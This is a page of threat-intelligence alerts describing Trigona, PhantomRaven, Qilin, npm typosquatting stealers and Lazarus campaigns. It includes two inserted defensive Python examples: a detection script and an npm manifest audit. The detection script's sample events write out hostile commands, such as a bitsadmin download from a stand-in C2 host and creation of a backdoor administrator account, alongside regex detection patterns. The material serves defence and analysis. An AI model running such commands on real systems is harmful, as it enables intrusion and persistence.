
Threat Alerts

Your place for the latest CyberProof cyber threat intelligence alerts and updates


Trigona Ransomware Targets MS-SQL Servers with Rust Scanner

03-Nov-2025
Label: Ransomware
Threat Level: Medium

The Trigona ransomware group continues targeting Microsoft SQL servers through brute-force attacks, now deploying advanced Rust-based scanners and remote access tools. These attacks exploit weak credentials and exposed database servers to establish persistent access and deploy ransomware payloads.

The attack chain begins with reconnaissance commands to gather system information, followed by exploitation of the Bulk Copy Program (BCP) utility to store and reconstruct malware within SQL tables before exporting as executable files. Attackers use various download methods including curl, Bitsadmin, and PowerShell to retrieve additional payloads from command-and-control servers. The group maintains persistence through multiple remote access tools including AnyDesk, RDP connections, and the Teramind monitoring platform, creating administrative accounts with names like “Remote99” and “Ladmin” to facilitate ongoing access.

Recent campaigns feature new Rust-written scanner malware that identifies vulnerable RDP and MS-SQL endpoints across the internet, sending system information to command servers before executing scanning operations. The threat actors deploy custom stress-testing tools written in Go that perform SQL injection and HTTP flood testing for network reconnaissance. Additional utilities disable Windows Defender, delete forensic traces, and replace legitimate system executables with malicious versions. The consistent use of specific table names and format files across multiple campaigns demonstrates the group’s operational continuity and systematic approach to database server compromise.
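A defender-side triage example for the tradecraft described in this alert (added here, not part of the CyberProof alert): it classifies Windows process-creation events for shells spawned by the SQL Server process, BCP exporting table contents through a format file, LOLBin downloaders, and creation of the named administrative accounts. The (parent, command line) event shape and the sample events are constructed for illustration.

```python
"""Triage of process-creation events for the Trigona MS-SQL pattern:
child processes of sqlservr.exe (xp_cmdshell-style execution), BCP used to
export table contents to a file via a format file, curl/bitsadmin/PowerShell
downloads, and 'net user ... /add' for the account names seen in the campaign.
Event shape and samples are constructed, not taken from a real incident."""
import re
from dataclasses import dataclass

DOWNLOADERS = re.compile(
    r"\b(curl|bitsadmin|invoke-webrequest|downloadfile|iwr|wget)\b", re.I)
ACCOUNT_NAMES = re.compile(r"\bnet1?\s+user\s+(remote99|ladmin)\b.*\s/add\b", re.I)
# bcp ... queryout|out <file> ... -f <format file>
BCP_EXPORT = re.compile(r"\bbcp(\.exe)?\b.*\b(queryout|out)\b.*\s-f\s", re.I)


@dataclass
class Event:
    parent: str    # image name of the parent process
    cmdline: str   # full command line of the created process


def classify(ev: Event) -> list[str]:
    """Return the names of the rules the event matches (empty list = no hit)."""
    hits = []
    if ev.parent.lower() == "sqlservr.exe":
        # A database engine spawning anything implies xp_cmdshell or similar.
        hits.append("sql-server-spawned-process")
    if BCP_EXPORT.search(ev.cmdline):
        hits.append("bcp-export-with-format-file")
    if DOWNLOADERS.search(ev.cmdline):
        hits.append("lolbin-download")
    if ACCOUNT_NAMES.search(ev.cmdline):
        hits.append("trigona-admin-account")
    return hits


def triage(events: list[Event]) -> list[tuple[str, list[str]]]:
    """Keep only events that matched at least one rule."""
    return [(ev.cmdline, h) for ev in events if (h := classify(ev))]


SAMPLE_EVENTS = [  # constructed events; URL and paths are placeholders
    Event("sqlservr.exe", "cmd.exe /c whoami & systeminfo"),
    Event("cmd.exe", 'bcp "select data from dbo.stage" queryout '
                     "C:\\Windows\\Temp\\svc.exe -f C:\\Windows\\Temp\\fmt.xml -T"),
    Event("cmd.exe", "bitsadmin /transfer job /download "
                     "http://c2.example.invalid/p.bin C:\\Windows\\Temp\\p.bin"),
    Event("cmd.exe", "net user Remote99 P@ss /add"),
    Event("explorer.exe", "notepad.exe C:\\notes.txt"),
]

if __name__ == "__main__":
    for cmdline, hits in triage(SAMPLE_EVENTS):
        print(f"{hits}: {cmdline}")
```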

Malicious npm Packages Used in Global PhantomRaven Campaign

03-Nov-2025
Label: Malware
Threat Level: Medium

A sophisticated malware campaign identified as PhantomRaven has been active since August 2025, deploying 126 malicious npm packages that have collectively reached over 86,000 downloads. The campaign specifically targets software developers and CI/CD pipelines, harvesting npm authentication tokens, GitHub credentials, and build environment secrets while using advanced evasion techniques.

PhantomRaven leverages a novel technique known as Remote Dynamic Dependencies (RDD) to conceal malicious code from security scanners. Instead of embedding malicious payloads directly within npm packages, the malware retrieves hidden dependencies from attacker-controlled URLs at install time—bypassing npm’s dependency checks and appearing harmless to automated tools. When developers execute npm install, lifecycle scripts such as preinstall, install, and postinstall hooks run automatically, enabling silent infection without user interaction.

Once installed, the malware scans the development environment for sensitive information, including .gitconfig, .npmrc, GitHub Actions tokens, GitLab CI, Jenkins, and CircleCI credentials. It exfiltrates data via multiple redundant channels—HTTP GET and POST requests, and fallback WebSocket connections—to ensure delivery even in restricted environments. The campaign’s operators employ carefully crafted package names designed to exploit LLM-generated coding suggestions from tools like GitHub Copilot or ChatGPT, making this one of the most adaptive and socially engineered npm-based threats observed to date.

Qilin Ransomware Surges with Dual-Stage Encryption and Data Theft

03-Nov-2025
Label: Ransomware
Threat Level: Medium

Qilin remains one of 2025’s most active and damaging ransomware operations, publishing more than 40 victims per month and frequently peaking at ~100 postings during high-activity months. Recent cases show a clear focus on manufacturing, professional and scientific services, and wholesale trade across the United States, Canada, the UK, France and Germany. Investigations reveal that attackers frequently gain network footholds via compromised VPN or exposed administrative credentials, then move with RDP and domain-level reconnaissance to enumerate controllers, users and privileges. Once inside, the actors collect credentials with a suite of credential harvesters and custom scripts, consolidate results, and exfiltrate sensitive data using legitimate tools and cloud-transfer utilities to obscure traffic. Artifact traces also point to the use of common system tools for manual review of stolen files and, in some scripts, character encodings that hint at an Eastern European or Russian-speaking origin.

Operationally, Qilin commonly runs two complementary encryptors: one that spreads across hosts (often via remote execution tooling) and another that runs from a single system to rapidly encrypt network shares and cluster storage. The intrusions show layered defensive evasion — obfuscated PowerShell, AMSI/TLS bypasses, attempts to disable EDR, and anti-forensics such as deleting Windows event logs and clearing shadow copies — followed by destructive actions that inhibit recovery. Post-execution persistence uses scheduled tasks and Run key entries, while ransom notes and dedicated leak sites pressure victims with data exposure.

Malicious npm Packages Target Developers

03-Nov-2025
Label: Malware
Threat Level: Medium

A sophisticated supply-chain attack on the npm ecosystem exposed developers to a multi-stage credential-theft operation through 10 malicious packages disguised as legitimate developer tools. Remaining active for over four months and accumulating nearly 10,000 downloads, the campaign used typosquatting to publish fake versions of widely used libraries (TypeScript, discord.js, ethers.js, react-router-dom, etc.), compromising developer environments across Windows, macOS, and Linux. Infection begins when developers install the typosquatted packages: malicious postinstall scripts run immediately, detect the OS, and launch heavily obfuscated payloads in new terminal windows to evade detection. The malware uses four layers of obfuscation (self-decoding wrappers, dynamic XOR encryption, URL encoding, and mixed-base control-flow obfuscation) and presents a convincing fake CAPTCHA that requests interaction while silently sending the victim’s IP to an attacker-controlled server for profiling and filtering.

After the fake CAPTCHA, the campaign downloads a 24 MB PyInstaller binary tailored to the victim’s platform; this information-stealer harvests credentials from system keyrings, web browsers, and cloud/DevOps tooling (AWS credentials, Kubernetes configs, Docker settings, Git credentials), including session cookies that can bypass multi-factor authentication and enable prolonged cloud impersonation. Harvested data is compressed into ZIP archives stored in temporary directories and exfiltrated to attacker infrastructure. The modular, multi-stage design (immediate postinstall execution, platform-specific binaries, layered obfuscation, fingerprinting via IP profiling, and efficient packaging/exfiltration) maximizes theft while minimizing detection, illustrating the growing sophistication of supply-chain threats to developer ecosystems.
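A pre-install manifest audit that covers the two npm mechanisms described in the PhantomRaven alert and in this one (added example, not code from CyberProof or from either campaign): dependency specs that point at an arbitrary URL rather than the registry (the Remote Dynamic Dependencies pattern) and preinstall/install/postinstall hooks that run on `npm install`. The package.json below is constructed for illustration.

```python
"""Audit a package.json before installing it: report non-registry dependency
specs (tarballs or repositories fetched from a URL at install time) and any
lifecycle scripts that npm would run automatically. Sample manifest is
constructed; the package and URL are placeholders."""
import json
import re

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")
# Specs that make npm fetch code from wherever the string points instead of
# resolving a version against the registry.
REMOTE_SPEC = re.compile(r"^(https?://|git\+|github:|gitlab:|bitbucket:|gist:)", re.I)
DEP_FIELDS = ("dependencies", "devDependencies", "optionalDependencies")


def audit_manifest(manifest_json: str) -> dict:
    """Return {'remote_dependencies': [(field, name, spec)...],
               'lifecycle_hooks': {hook: command}}."""
    pkg = json.loads(manifest_json)
    remote = []
    for field in DEP_FIELDS:
        for name, spec in pkg.get(field, {}).items():
            if isinstance(spec, str) and REMOTE_SPEC.match(spec):
                remote.append((field, name, spec))
    hooks = {k: v for k, v in pkg.get("scripts", {}).items() if k in LIFECYCLE_HOOKS}
    return {"remote_dependencies": remote, "lifecycle_hooks": hooks}


def is_suspicious(report: dict) -> bool:
    """Either finding warrants manual review before the install proceeds."""
    return bool(report["remote_dependencies"] or report["lifecycle_hooks"])


SAMPLE_MANIFEST = json.dumps({  # constructed example, not a real package
    "name": "some-helper",
    "version": "1.0.3",
    "dependencies": {
        "lodash": "^4.17.21",
        "helper-core": "http://packages.example.invalid/helper-core-1.0.0.tgz",
    },
    "scripts": {
        "build": "tsc -p .",
        "postinstall": "node ./setup.js",
    },
})

if __name__ == "__main__":
    report = audit_manifest(SAMPLE_MANIFEST)
    print("review required" if is_suspicious(report) else "clean", report)
```

Installing with `npm install --ignore-scripts` and reviewing the reported hooks first keeps a flagged package from executing anything until a human has looked at it.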

Silent Injector Deploying Dual Malware Forces

03-Nov-2025
Label: Malware
Threat Level: Medium

A sophisticated malware loader discovered in May 2025 represents a significant threat to system security through its ability to deploy multiple malware families simultaneously. The loader demonstrates advanced evasion techniques and establishes deep persistence mechanisms on infected systems, enabling attackers to maintain long-term access and control over compromised machines. Its use of previously unseen API hashing methods and its multi-stage infection process make detection and remediation particularly challenging.

The infection begins when victims encounter a ZIP file containing hidden system files alongside a single visible legitimate executable. When executed, this file triggers a DLL sideloading attack that loads a malicious library, which subsequently injects two distinct malware loaders into separate processes. The loader employs API hashing through the MurmurHash2 algorithm for dynamic function resolution, a technique that complicates analysis and detection efforts. Payloads are protected using AES-128-ECB encryption and LZMA compression, requiring decryption and decompression before execution. The malware creates a suspended process and injects its payloads into virtual memory, while establishing persistence through registry modifications and file placement in the local application data directory to ensure automatic execution at system startup.

The two deployed malware families serve complementary purposes in the attack chain. The first payload functions as a downloader that communicates with remote infrastructure through the TOR network, enabling anonymous command-and-control operations. The second payload is a commercial remote access tool that grants attackers direct control over infected systems. Both components utilize Protocol Buffers for data serialization and maintain their own persistence mechanisms.

Lazarus Deploys Modular DreamLoader

03-Nov-2025
Label: Malware
Threat Level: Medium

A sophisticated campaign targeting professionals uses fake job recruitment lures to deliver a new malware family, DreamLoader, which employs modular deployment frameworks for flexible, persistent operations. Initial delivery comes as password-protected ZIP archives containing trojanized legitimate software; when executed, multiple loader variants are installed via DLL sideloading that abuses trusted Windows binaries and legitimate system processes to evade detection. The loaders create registry keys and trigger secondary payloads that perform credential theft and reconnaissance, and they deploy Base64-encoded, encrypted payloads which decrypt into additional components that authenticate to Microsoft services using embedded access tokens and communicate with compromised SharePoint instances through the Microsoft Graph API.

The most complex component functions as a malicious service that keeps encrypted payload files separate from the main loader and chains recursive decryption/loading steps, each layer unpacking the next, making analysis and detection markedly harder. This modular, multi-stage architecture enables operators to push different payloads as needed (with evidence of identical payloads across multiple hosts), combining targeted social engineering with technical sophistication to maintain stealth, persistence, and resilient command-and-control using Microsoft infrastructure.
